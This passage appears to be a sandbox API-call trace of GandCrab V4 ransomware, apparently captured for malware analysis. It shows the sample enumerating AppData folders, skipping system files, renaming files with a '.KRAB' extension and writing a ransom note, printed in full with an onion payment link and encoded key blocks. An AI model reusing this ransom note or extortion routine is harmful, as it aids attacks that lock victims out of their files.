returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\KRAB-DECRYPT.txt" [0059.741] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.742] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\KRAB-DECRYPT.txt.KRAB") returned 75 [0059.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\KRAB-DECRYPT.txt") returned 70 [0059.742] lstrlenW (lpString=".txt") returned 4 [0059.742] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.742] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.742] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\KRAB-DECRYPT.txt") returned 70 [0059.743] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\KRAB-DECRYPT.txt") returned 70 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.743] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.743] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.743] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0059.743] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0059.743] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="XLSTART" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0059.743] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0059.743] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.744] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.744] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.744] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.744] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.744] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.744] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.744] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\KRAB-DECRYPT.txt") returned 79 [0059.745] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\xlstart\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0059.745] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.745] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.746] CloseHandle (hObject=0x440) returned 1 [0059.746] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.747] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.747] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x3b2)) [0059.747] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.747] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.747] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.748] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a08d2ca4dee3d.lock") returned 85 [0059.748] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\xlstart\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0059.748] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.749] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 62 [0059.749] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0059.749] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd220 [0059.749] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.749] FindNextFileW (in: hFindFile=0xfbd220, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.749] FindNextFileW (in: hFindFile=0xfbd220, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.749] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.749] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.749] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a08d2ca4dee3d.lock" [0059.749] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.750] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0059.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\d2ca4a08d2ca4dee3d.lock") returned 85 [0059.750] lstrlenW (lpString=".lock") returned 5 [0059.750] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.750] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.750] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.750] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.751] FindNextFileW (in: hFindFile=0xfbd220, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.751] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.751] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\KRAB-DECRYPT.txt" [0059.751] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.751] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\KRAB-DECRYPT.txt.KRAB") returned 83 [0059.751] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\KRAB-DECRYPT.txt") returned 78 [0059.751] lstrlenW (lpString=".txt") returned 4 [0059.751] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.752] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.752] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\KRAB-DECRYPT.txt") returned 78 [0059.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\KRAB-DECRYPT.txt") returned 78 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.752] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.752] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.753] FindNextFileW (in: hFindFile=0xfbd220, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0059.753] FindClose (in: hFindFile=0xfbd220 | out: hFindFile=0xfbd220) returned 1 [0059.753] CloseHandle (hObject=0x440) returned 1 [0059.753] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0059.753] FindClose (in: hFindFile=0xfbd6e0 | out: hFindFile=0xfbd6e0) returned 1 [0059.753] CloseHandle (hObject=0x3ac) returned 1 [0059.754] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0059.754] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0059.754] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0059.754] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0059.754] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0059.754] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.754] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.754] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.754] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.754] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.754] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.756] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.756] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\KRAB-DECRYPT.txt") returned 83 [0059.756] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0059.760] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 